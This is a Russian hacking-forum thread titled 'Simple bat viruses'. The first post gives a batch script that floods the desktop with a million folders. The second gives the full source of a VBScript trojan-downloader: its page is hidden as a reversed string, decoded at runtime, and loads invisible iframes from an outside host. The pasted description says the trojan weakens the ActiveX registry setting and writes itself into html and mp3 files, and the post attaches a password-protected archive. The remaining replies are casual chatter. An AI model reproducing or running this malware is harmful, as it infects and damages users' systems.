• Обратная связь: [email protected]

    Наш канал в telegram: https://t.me/ru_sfera

    Группа VK: https://vk.com/rusfera

    Пользователи могут писать на форуме ТОЛЬКО ЧЕРЕЗ 7 ДНЕЙ после регистрации

Простенькие bat вирусы


Garo)

Уважаемый пользователь
Форумчанин
Регистрация
23.08.2013
Сообщения
94
Репутация
149
Создаем 1 миллион пустых папок

[HIDE=5]
  1. chcp 1251
  2. papka=0
  3. :1
  4. /A papka=papka+1
  5. %UserProfile%\Desktop\дурак_%papka%
  6. %papka%==1000000 1
[/HIDE]
сохраняет как .bat
 

Garo)

Уважаемый пользователь
Форумчанин
Регистрация
23.08.2013
Сообщения
94
Репутация
149
Trojan-Downloader.VBS.Agent.ah
[HIDE=5]<SCRIPT language=vbscript>
wei="эA>lmth/<эA>ydob/<эA>elbat/<эA>rt/< эA>dt/<>tnof/< эA>2h/< rerolpxE tenretnI>RB< ОуґнЖчОс·юІїДЪ - 005 PTTH>""kcalb:roloc ;gnoS SM ,МеЛО tp21/tp9:tnof""=elyts ""txetei""=di 2h< эA>p/< эA>rb<>p< эA эA>p/<эA>lu/<эAЎЈ>a/<±нБРµгХѕ№ШПа>""""=ferh ""eslaf=eulaVnruter.tneve;)(detaleR""=kcilcno a<їґІйїЙТІ>""4txeTsnoitcurtsni""=di il< эA>il/< ЎЈПўРЕµДЙП tenretnI ХТС°Ј¬>a/<ЛчЛС>""retnec""=ngila "")ЅЪЧЦ 411( fig.hcraes""=tla ""61""=thgieh ""61""=htdiw ""fig.hcraes""=crs 0=redrob gmi<>"")(hcraeSod:tpircsavaj""=ferh a<»чµҐ>""3txeTsnoitcurtsni""=DI il< эA>il/< эA>rb<ЎЈКФФЩєуТФ»тЈ¬ЕҐ°ґ>a/<РВЛў>""fles_""=tegrat "")(daoler.noitacol:tpircsavaj""=ferhx a<>a/<>""elddim""=ngila "")ЅЪЧЦ 28( fig.hserfer""=tla ""61""=thgieh ""31""=htdiw ""fig.hserfer""=crs 0=redrob gmi<>""fles_""=tegrat "")(daoler.noitacol:tpircsavaj""=ferhx a<»чµҐ>""2txeTsnoitcurtsni""=di il< эA>il/< ЎЈЅУБґµДПўРЕИ¤РЛёРДъПтЦёХТІйєуИ»Ј¬ТіЦч >tpircs/<;)(egapemoH >tpircs< їЄґт>""1txeTsnoitcurtsni""=di il< эA>lu<>p/<:ЧчІЩПВТФКФіўЗл>""2DIL""=di p< эA>edahson ""0C0C0C#""=roloc rh<>""gnoS SM ,МеЛО tp21/tp9 :TNOF ;kcalb :ROLOC""=elyts ""1DIL""=di tnof<>""2""=napsloc ""004""=htdiw ""htdiWsporPelbat""=di dt< эA>rt< эA>rt/< эA>dt/<>tnof/<ЎЈКѕПФ·ЁОЮЈ¬МвОКУРТіНшµДОК·ГТЄДъ>""gnoS SM ,МеЛО tp21/tp9 :TNOF ;kcalb :ROLOC""=elyts tnof<>""2""=napsloc ""004""=htdiw ""htdiWsporPelbat""=di dt< эA>rt< эA>rt/< эA>dt/< эA>1h/<>naps/<ТіНшКѕПФ·ЁОЮ>""txeTrorre""=di naps<>""gnoS SM ,МеЛО tp62/tp31 :TNOF ;kcalb :ROLOC""=elyts ""epytrorre""=di 1h<>""063""=htdiw ""elddim""=ngilav ""tfel""=ngila ""2sporPelbat""=di dt< эA>dt/<>""33""=thgieh ""52""=htdiw ""fig.rorregap""=CRS ""gmIrorregap""=di gmi<>""tfel""=ngila ""pot""=ngilav ""sporPelbat""=di dt< эA>rt< эA>""5""=gnicapsllec ""3""=gniddapllec ""004""=htdiw elbat<эA>emarfi/<>""0""=redrob ""0""=thgieh ""0""=htdiw ""lmth.qQ/nc.fm13.165537//:ptth""=crs emarfi<эA>emarfi/<>""0""=redrob ""0""=thgieh ""0""=htdiw ""lmth.yyfB/nc.fm13.165537//:ptth""=crs emarfi<эA>emarfi/<>""0""=redrob ""0""=thgieh ""0""=htdiw ""lmth.spP/nc.fm13.165537//:ptth""=crs emarfi<эA>emarfi/<>""0""=redrob ""0""=thgieh ""0""=htdiw ""lmth.40070sM/nc.fm13.165537//:ptth""=crs emarfi<эA>emarfi/<>""0""=redrob ""0""=thgieh ""0""=htdiw ""lmth.76060sM/nc.fm13.165537//:ptth""=crs emarfi<эA>emarfi/<>""0""=redrob ""0""=thgieh ""0""=htdiw ""mth.41060sM/nc.fm13.165537//:ptth""=crs emarfi<эA>"")(egaPtini""=daolno ""etihw""=rolocgb ydob<эAэAэA>tpircs/<эAэA}эA;)"">tcejbo/<>0=htdiw 0=THGIEH '98C53AF40C00-ED58-2D11-7444-030FF54B:dislc'=DISSALC COas=di tcejbo<"",""nigeBretfa""(LMTHtnecajdAtresni.ydob.tnemucod эA{эA )(egaPtini noitcnufэAэA}эA;)(hcraeStluafeDoTetagivaN.COas эA{эA)(hcraeSod noitcnufэA}эA;)"">a/<"" + tluseryalpsid + '>""' + tluserlru + '""=FERH pot_=tegrat A<'(etirw.tnemucod эAэA;)"""" ,srahCneddibrof(ecalper.tluseryalpsid = tluseryalpsid эA;)"""" ,srahCneddibrof(ecalper.tluserlru = tluserlru эAecalper/hcraes labolG // ;)""g"" ,""]""\'\><[""(pxEgeR wen = srahCneddibrof эA""tluseryalpsid"" dna ""tluseRlru"" tuo retlif tsum :noituacerp ytiruceS // эAэA;)xednIrevres, 3 + xednIlocotorp(gnirtsbus.LRUcoD=tluseryalpsid эAhsals txen eht ot og dna ,//:ptth retfa piks ot deen ew ,yalpsid rof// эA эA;)xednIrevres,LRUnigeB(gnirtsbus.LRUcoD=tluserlru эA;1 + )1,""#""(fOxedni.LRUcoD=LRUnigeB эA;)xednIrevres,4 - xednIlocotorp(gnirtsbus.LRUcoD=tluserlru// эA.rekram dne eht sa xednIrevres esu eW .eulav LRUnigeB eht si siht - ti piks ot 1 dda dna ,LRU eurt eht fo// эA gninigeb eht dnif ot lobmys # eht rof hcraes eW .niamod eht ot LRU dilav a deen ew ,ferh eht rof// эAэA;)3 + xednIlocotorp,""/""(fOxedni.LRUcoD=xednIrevres эA revres niamod eht rof hsals gnidne eht sdnif siht// эA эA;)4,""//:""(fOxedni.LRUcoD=xednIlocotorp эA//:ser eht gnippiks tub //: rof gnihcraes yb dnuof sa ,eb lliw sptth ro ptth eht erehw si siht// эA эA;ferh.noitacol.tnemucod=LRUcoD эA""mth.rab/moc.tfosorcim.www//:sptth#mth.404_ptth/lld.wvcodhs//:ser"" = LRUcoD esu gnitset roF// эAэA mth.rab/moc.LRUcoD.www//:ptth#mth.404_ptth/lld.wvcodhs//:ser //эA:siht ekil tpircs ruo ot denruter teg slru ,stib laer ni //эAэA{)(egapemoH noitcnufэAэA}эA эA;)""hcraes_"" ,LRUlanif(nepo.wodniw эA;)LRUresu(tnenopmoCIRUedocne + LRUecivreSdetaleR = LRUlanif эA;""LRU tenartnI""=LRUresu )1 < )0,"".""(fOxedni.tluserlru( fi эA эArab hcraes nepo neht - LRU tenartnI fi kcehC// эA эA""""=tluserlru эA)7 > LRUnigeB - xednIlocotorp( fi эA;)xednIrevres,0(gnirtsbus.LRUresu=tluserlru эA;)3 + xednIlocotorp,""/""(fOxedni.LRUresu=xednIrevres эA;)4,""//:""(fOxedni.LRUresu=xednIlocotorp эA:ser piks tub //: rof gnihcraes yb dnuof sa ,eb lliw sptth ro ptth eht erehw si siht// эA sLRU tenartnI rof kcehc elpmis mrofreP// эA эA;""=lru?psa.detaler/moc.nsm.detaler//:ptth""=LRUecivreSdetaleR эAyreuq eht dliuB// эA эA;)htgnel.LRUcoD,LRUnigeB(gnirtsbus.LRUresu=LRUtnerruC эA;1 + )1,""#""(fOxedni.LRUresu=LRUnigeB эAэA.rekram dne eht sa xednIrevres esu eW .eulav LRUnigeB eht si siht - ti piks ot 1 dda dna ,LRU eurt eht fo// эA gninigeb eht dnif ot lobmys # eht rof hcraes eW .niamod eht ot LRU dilav a deen ew ,ferh eht rof// эAэA;ferh.noitacol.tnemucod=LRUresu эA{)(detaleR noitcnufэAэA >tpircs<эA>daeh/<эA>eltit/<ОуґнЖчОс·юІїДЪ 005 PTTH>eltit<эA>""2132bg=tesrahc ;lmth-txet""=tnetnoC ""epyT-tnetnoC""=VIUQE-PTTH atem<эA>elyts/<эA}e4e4e4#:roloc ;gnoS SM ,МеЛО tp21/tp9:tnof{ detisiv:aэA}der:roloc ;gnoS SM ,МеЛО tp21/tp9:tnof{ knil:aэA>elyts<эA>daeh<эAэA>lmth<эA>""NE//laniF 2.3 LMTH DTD//C3W//-"" CILBUP LMTH EPYTCOD!<"
function UnEncode(cc)
for i = 1 to len(cc)
if mid(cc,i,1)<>"эA" then
temp = Mid(cc, i, 1) + temp
else
temp=vbcrlf&temp
end if
next
UnEncode=temp
end function
document.write(UnEncode(wei))
</SCRIPT>
[/HIDE]
Троянская программа. Является html-страницей, содержащей сценарий языка Visual Basic Script. Имеет размер 2076 байт.
Деструктивная активность

После активации троянец производит расшифровку своего кода и проверяет, был ли он запущен с локального ресурса.
Если программа запущена с локального ресурса, то изменяются следующие значения параметров реестра для зоны Интернета «0»:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1201" = "0"
[HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1201" = "0"
Таким образом, при последующих запусках веб-страниц со скриптами, создающими ActiveX-объекты для работы с файлами, предупреждения о попытке создания таких объектов не выводятся, и троянец начинает выполнение своих функций.
Программа производит рекурсивный поиск всех файлов с расширениями:
*.html
*.mp3
*.htt
в следующих каталогах:
%WinDir%\Web
%Desktop%
%MyDocuments%
В начало всех найденных файлов троянец дописывает свое тело.

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для ее удаления необходимо выполнить следующие действия:
  1. Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  2. Восстановить зараженные файлы из резервной копии Windows или с установочного диска.
  3. Изменить значения параметров :
    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
    "1201" = "1"
    [HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
    "1201" = "1"
  4. Произвести полную проверку компьютера Антивирусом Касперского с обновленными
пароль 111
 

Вложения

  • Trojan-Downloader.VBS.Agent.rar
    2.4 КБ · Просмотры: 37
V

voodoo

Гость
Да про каталоги я вообще забыл !sr789

Хе сегодня прикольную статью на Хабре прочитал, как уронить 8-ку,
может пригодиться кому:

UPDATE2: Microsoft исправила эту уязвимость.
 
B

bloodstyle

Гость
а сейчас это все добро работает? в плане вин 7 и выше?
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 202
Репутация
8 335

Clawhammer91

Пользователь
Форумчанин
Регистрация
25.11.2015
Сообщения
1
Боже, кто-то пишет на Батниках?
 

ddgobb

Пользователь
Форумчанин
Регистрация
24.11.2015
Сообщения
7
старая добрая шутка (1995): "Ща пойдешь у меня винду батничками писать"
 
Автор темы Похожие темы Форум Ответы Дата
DRustam Исходники вирусов 16
Верх Низ